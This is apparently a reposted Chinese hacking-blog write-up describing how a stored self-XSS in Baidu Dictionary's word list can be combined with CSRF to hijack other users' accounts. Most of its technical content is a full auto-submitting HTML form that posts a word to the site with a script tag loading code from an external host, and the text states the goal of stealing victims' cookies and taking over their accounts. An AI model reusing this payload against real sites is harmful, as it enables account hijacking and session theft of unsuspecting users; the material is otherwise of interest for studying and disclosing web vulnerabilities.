记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

百度某站可结合CSRF及XSS劫持账号

2013-09-22 17:10

百度某站可结合csrf及xss劫持账号,本来是一个self-xss,后来觉得可以结合csrf,今天才发现已经有人才这么干了!
百度词典-我的词典

将生词添加生词本,备注的时候没有过滤,直接添加js 可被执行。

这是一个self-xss ,无法交互影响到他人,于是考虑csrf,自动添加一个单词并且备注为【xss code】

由于是post 请求,构造页面


<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<form id="baidu" name="baidu" action="http://dict.baidu.com/wordlist.php" method="POST">
<input type="text" name="req" value="add" />
<input type="text" name="word" value="Wooyun" />
<input type="text" name="explain" value="<script src=http://xsserme></script>" />
<input type="submit" value="submit" />
</form>
<script>
document.baidu.submit();
</script>
</body>
</html>



诱惑其他人访问此页面的效果


还有一个json?

看内容与金山词霸有点关系哦,没有深入
http:\/\/res.iciba.com\/resource\/amp3\/0\/0\/90\/01\/9001507f72.mp3

至此可某学霸的单词本里植入一个单词,偷走他的cookie,游荡他的账号,给女神发短消息。

另外,这里还有个mysql 报错,问了大牛


 


知识来源: www.2cto.com/Article/201309/245277.html

阅读:116394 | 评论:0 | 标签:xss CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“百度某站可结合CSRF及XSS劫持账号”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云